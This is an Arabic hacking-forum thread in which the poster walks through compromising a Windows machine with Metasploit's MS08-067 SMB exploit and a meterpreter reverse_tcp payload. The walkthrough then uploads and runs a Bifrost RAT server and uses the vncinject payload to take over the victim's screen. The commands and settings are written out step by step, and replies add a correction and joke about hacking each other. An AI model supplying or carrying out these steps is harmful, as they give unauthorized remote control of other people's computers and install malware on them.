![]() |
الإختراق القاتل metasploit+bifrost معا وأنا أفكر طرأت لي فكرة لا أعرف إن كانت طرحت بعد المهم هي إختراق الضحية بالميتا ورفع سيرفر بيفروست وكما سأتحدث عن سيطرة الجهاز بإستخدام playoad windows/vncinject وسأجربها علي جهاز إفتراضي كفانا من الكلام ولنبدأ. من يرد التجربة علي جهازه فليقم بتحميل vbox أو ليقرأ موضوعي السابق علي هذا الرابط والشرح سيكون بالصور الشرح بالفيديو http://img194.imageshack.us/img194/9...0702183620.png إضغط علي window وبعد ذلك علي console ستفتح لنا النافذة التالية نكتب show exploits http://img27.imageshack.us/img27/5264/exploitscmd3.png ونختار windows/smb/ms08_067_netapi show payloads http://img25.imageshack.us/img25/3329/payloads.png ونختار windows/meterpreter/reverse_tcp أو نختارها مباشرة كما ف الصورة http://img16.imageshack.us/img16/7027/setexploit5.png والآن نقوم بتحديد IP الضحية وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101 ولا تنسي أن تضع قم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enter http://img139.imageshack.us/img139/4...chexploit6.png كما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445 ************************************************** ********************** لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\ كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلد C:\Program Files\****sploit\Framework3 http://img200.imageshack.us/img200/9...oadserver6.png ************************************************** *********************** بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية: use -m process execute -f cmd.exe -c interact 3 كما في الصورة حسب رقم channel أو session المفتوح http://img37.imageshack.us/img37/6270/73006251.png لتشغيل السيرفر start server.exe ************************************************** ************************ وكما توضح الصورة نجاح تحميل السيرفر http://img213.imageshack.us/img213/9439/70700213.png والصور تعبر عن نفسها http://img190.imageshack.us/img190/6250/30769969.png شاشة الضحية http://img197.imageshack.us/img197/482/55987753.png ************************************************** ************************ لتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال payload windows/meterpreter/reverse_tcp set payload windows/vncinject/reverse_tcp بتطبيق الثغرة ستفتح لنا الشاشة التالية http://img269.imageshack.us/img269/1700/11vncinject.png |
شكرا عل الموضوع لكن حسب علمي عندك خطأ في الموضوع set windows/meterpreter/reverse_tcp تبدل بـ set windows/vncinject/reverse_tcp |
مشكور لقد تم تصحيح الخطأقتال2 |
مشكور لكن ليش ترفع سيرفر ادا كنت بتعمل vnc inject و تكون متحكم بكامل الجهاز |
اقتباس:
|
اقتباس:
|
حلووووووووووو الموضوووع ويستاااااااااهل التثبيت مشكوووووووووووور اخي وتقبل مروري يله سلام |
موضوع رائع سأحاول تجربته و ان نجحت العملية ستكو ن انت يا punisher77 اول ضحية لي لووللووللوول مشكور اخي |
مشكووووووووور |
مشكوووووووووووووووور اخوي على الشرح الرائع وكنت نااوي ارد من زماان بس كنت مشغوول |
مشكوووور أخي |
ونختار windows/smb/ms08_067_netapi show payloads http://img27.imageshack.us/img27/5264/exploitscmd3.png ونختار windows/meterpreter/reverse_tcp أو نختارها مباشرة كما ف الصورة http://img16.imageshack.us/img16/7027/setexploit5.png ارجوا ان توضحوا الصورتين فانا لم افهمهمــ ،، لانه لايمكن الضغط على windows/smb/ms08_067_netapi و windows/meterpreter/reverse_tcp ارجوا ان توضحوا لي وشكرا |
تشكر أخوي :a15::a15::a15::a15::a15: |
مشكور يااخي عاي الموضوع |
مشكور علي الردود كنت مشغولا أخي يجب أن تنسخ الثغرة وتضعها هنا> msf(ms08_067_netapi |
الساعة الآن 08:11 PM |
[ vBspiders.Com Network ]